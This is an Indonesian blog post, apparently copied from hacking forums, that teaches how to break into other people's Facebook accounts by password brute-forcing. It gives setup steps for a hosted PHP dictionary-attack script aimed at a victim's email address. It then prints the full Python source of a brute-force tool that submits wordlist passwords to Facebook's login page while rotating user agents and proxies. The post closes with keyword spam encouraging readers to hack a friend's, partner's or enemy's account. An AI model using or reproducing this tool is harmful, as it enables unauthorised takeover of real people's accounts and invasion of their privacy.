PERTAMA:
Cara hack facebook dengan metode
ini adalah cara paling bodoh untuk
membobol facebook dan biasanya
paling terakhir digunakan, karena
membutuhkan waktu yang tidak
singkat. metode hacking facebook
dengan cara ini adalah dengan
menggunakan software bruteforce
untuk menebak-nebak password
facebook sebuah akun dari sebuah
file dictionary / kamus atau juga
character generator. cara mencegah
hack facebook dengan metode ini
adalah dengan melindungi alamat
email yang anda gunakan untuk
login facebook, caranya bisa
bermacam-macam, anda bisa
memisah antara email untuk umum
dan email untuk login facebook dan
tidak menampilkannya di halam
profil facebook anda.
KEDUA:
Postingan tentang hacking
facebook ini gue copas aja dari situs
jasakom.com :
Facebook, ? iya sapa yg tidak kenal
dengan situs jejaring sosial ini. Ga
punya account tetapi setidaknya
pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah
satu fenomena di beberapa tahun
belakangan ini setelah
pendahulunya friendster. Nah
sebagai situs pertemanan, situs
jejaring sosial ini tidak luput dari ke
isengan tangan2 jahil, motifnya pun
beragam, mulai dari isengin
pemiliknya, revenge, sakit hati, dan
yg paling parah adalah karena
dengan motif buat nyari CHIPS
POKER (nah lo, ngaku aja lo pada
)
Implementasi Facebook Hacking
Dengan Brute Force
Berbagai teknik telah banyak
beredar di kalangan underground,
teknik nya pun beragam, mulai dari
teknik phising ( fake login ),
maupun keylogger hanya dengan
tujuan untuk mendapatkan account
pribadi targetnya.
ok, cukup basa basinya rel…..to the
point aja deh
sebelumnya kita musti bikin
persiapan dolo, ibarat mo perang
senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting
(gratis/ bayar) buat upload and
nyimpen script 2 berikut.
Facebook BruteForce Script
Simple Dictionary Attack
Nah, file itu adalah file utama yg
harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu
bikin tambah dan edit sendiri dari
wordlist Dictionary ataw mungkin
bisa cari yg lebih lengkap.
OK, persiapan telah
selesai….saatnya ke medan
perang……ga deng, maksudnya kita
akan melakukan testing.
disini saya asumsikan lo pada udah
punya hosting buat tempat naroh
file-file tadi.
klo ga tau cara bikin hosting
silahkan tanya ke google yah )
1.pada source code Facebook
Dictionary attacknya kita edit dolo
sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi
gede misalnya 500 dan ini dalam
hitungan detik hingga code itu
menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya
target@bego.com hingga pada
code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita.
biasanya diletakkan dalam satu
directory
Setelah Semuanya di Edit, upload ke
Hostingan yg kamu punya, misalkan
saya punya Hosting (orang) yg saya
pakai untuk contoh ini saya upload
ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut
sukses di upload dalam 1 direktory
setelah sukses, skr tinggal eksekusi
tuh via eb address.
misalkan lo nyimpen di direktory /
home/xxx.com/images/ maka
eksekusi aja di http://xxx.com/
images/
jika di eksekusi maka script akan
mencoba membruteforce account
milik target lo.
Jika dah selesai , maka log hasil
bruteforce tadi akan tersimpan
dengan nama cookie.txt. pada
direktory yg sama . silahkan di
analisa hasilnya….
And last word, thanks for you
attention if u read a simple tutorial.
KETIGA:
Silakan download FbBruteforce:
Berikut Codenya:
#!/usr/bin/python
# This is facebook
bruteforcer tools
# This was written for
educational purpose and
pentest only. Use it at
your own risk.
# Author will not be
responsible for any
damage !!
# Toolname :
facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27
13:24:44 WIT 2010
# Special thanks to
mywisdom to inspire me
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install
mechanize python module
first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting
program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install
cookielib python module
first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting
program...\n"
sys.exit(1)
warnings.filterwarnings
(action="ignore",
message=".*gzip transfer
encoding is experimental!",
category=UserWarning)
# define variable
__programmer__ =
"gunslinger_ "
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://
www.facebook.com/?
sk=messages&ref=mb'
fblogin = 'https://
login.facebook.com/
login.php?login_attempt=1'
# some cheating ..
ouruseragent =
['Mozilla/4.0 (compatible;
MSIE 5.0; SunOS 5.10 sun4u;
X11)',
'Mozilla/5.0 (X11; U; Linux
i686; en-US;
rv:1.9.2.2pre)
Gecko/20100207 Ubuntu/9.04
(jaunty)
Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible;
MSIE 7.0; Windows NT 5.1;
Avant Browser;',
'Mozilla/4.0 (compatible;
MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible;
MSIE 7.0b; Windows NT
5.1)',
'Mozilla/5.0 (Windows; U;
Windows NT 6.0; en-US;
rv:1.9.0.6)',
'Microsoft Internet
Explorer/4.0b1 (Windows
95)',
'Opera/8.00 (Windows NT
5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible;
MSIE 5.0; AOL 4.0; Windows
95; c_athome)',
'Mozilla/4.0 (compatible;
MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible;
Konqueror/3.5; Linux)
KHTML/3.5.5 (like Gecko)
(Kubuntu)',
'Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.0;
ZoomSpider.net bot; .NET
CLR 1.1.4322)',
'Mozilla/4.0 (compatible;
MSIE 6.0; Windows NT 5.1;
QihooBot 1.0
qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible;
MSIE 5.0; Windows ME) Opera
5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___
___ | | __
| _/ _` |/ __/ _ \ '_ \ /
_ \ / _ \| |/ /
| || (_| | (_| __/ |_) |
(_) | (_) | <
|_| \__,_|\___\___|_.__/
\___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' %
(__programmer__,
__version__)
option = '''
Usage : %s [options]
Option : -u, --username |
User for bruteforcing
-w, --wordlist | Wordlist
used for bruteforcing
-v, --verbose | Set %s will
be verbose
-p, --proxy | Set http
proxy will be use
-k, --usernameproxy | Set
username at proxy will be
use
-i, --passproxy | Set
password at proxy will be
use
-l, --log | Specify output
filename (default :
fbbruteforcer.log)
-h, --help | Print this
help
Example : %s -u brad@hackme.com
-w wordlist.txt"
P.S : add "&" to run in the
background
''' % (sys.argv[0], sys.argv[0],
sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower()
== '--user':
username = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower
() == '--wordlist':
wordlist = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower()
== '--log':
log = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower
() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower
() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower()
== '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv
[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower()
== '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower
() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... "
% word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent',
random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" %
(username)
print "[*] Password : %s\n" %
(word)
file.write("\n[*] Logging in
success...")
file.write("\n[*] Username : %s" %
(username))
file.write("\n[*] Password : %s\n\n"
% (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except
mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their
system, please report bug at
yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing
their system, please report bug at
yudha.gunslinger@gmail.com\n")
sys.exit(1)
except
mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their
system, please report bug at
yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing
their system, please report bug at
yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh
(mechanize._http.HTTPRefreshProcessor
(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...
\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your
wordlist path\n"
file.write("\n[*] Error: Check your
wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...
\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" %
time.strftime("%X")
print "[*] Account for bruteforcing
%s" % (username)
print "[*] Loaded :",len
(words),"words"
print "[*] Bruteforcing, please
wait..."
file.write(facebook)
file.write("\n[*] Starting attack at
%s" % time.strftime("%X"))
file.write("\n[*] Account for
bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words"
% int(len(words)))
file.write("\n[*] Bruteforcing, please
wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
Nah, dari beberapa cara hack
facebook dan pencegahannya di atas
semoga anda lebih berhati-hati,
untuk lebih detail mengenai tiap
metode atau cara yang saya
sebutkan di atas akan saya bahas di
postingan saya yang selanjutnya,
semoga bermanfaat dan semoga
akun facebook anda tidak kena hack
Selamat berekperimen untuk
mencoba berbagai cara hack
facebook, berbagai cara hack fb,
berbagai cara hack account
facebook, hack facebook teman,
hack facebook pacar, hack facebook
musuh, hack akun facebook, cara
hack facebook, cara ngehack
facebook, cara hack password
facebook, cara hack account
facebook, crack facebook. cara
membobol password facebook, cara
menjebol password facebook, cara
membobol facebook, cara
mengetahui account facebook, cara
mengetahui password facebook,
cara menghack facebook, tutorial
hack facebook, tutorial hacking
facebook. cara hack facebook, cara
hack facebook orang lain, cara hack
facebook, cara hack fb, cara hack
password facebook, cara hack fb
2011, cara hack facebook orang, cara
hack facebook 2011, cara hack fb
orang lain, cara hack fb terbaru,
cara hack fb 2011, cara hack fb
orang, cara hack akun fb, cara hack
akun fb orang lain, cara hack akun
facebook terbaru, cara hack akun
facebook 2011, cara hack password
fb, cara hack account fb, cara hack
account facebook, cara hack account
facebook 2011, cara hack account
facebook terbaru, cara hack
facebook teman, cara hack facebook
pacar, cara hack fb teman, cara hack
fb pacar, crack facebook, cara crack
fb, cara menjebol fb, cara menjebol
akun, fb, cara membobol password
facebook, cara menjebol password
facebook, cara membobol facebook,
cara mengetahui account facebook,
cara mengetahui password
facebook, cara menghack facebook,
tutorial hack facebook, tutorial
hacking facebook, tutorial hack fb,
tutorial hacking fb, tutorial hacking
account fb, tutorial hacking account
facebook, tutorial hack account
facebook, tutorial hacking password
facebook, tutorial hack password
facebook, tutorial crack facebook.
Source: Berbagi artikel di Google!
[dhani,
gunslinger,*.blogspot.com,*.wordpress.com,*jasakom.com,
binushacker, dll]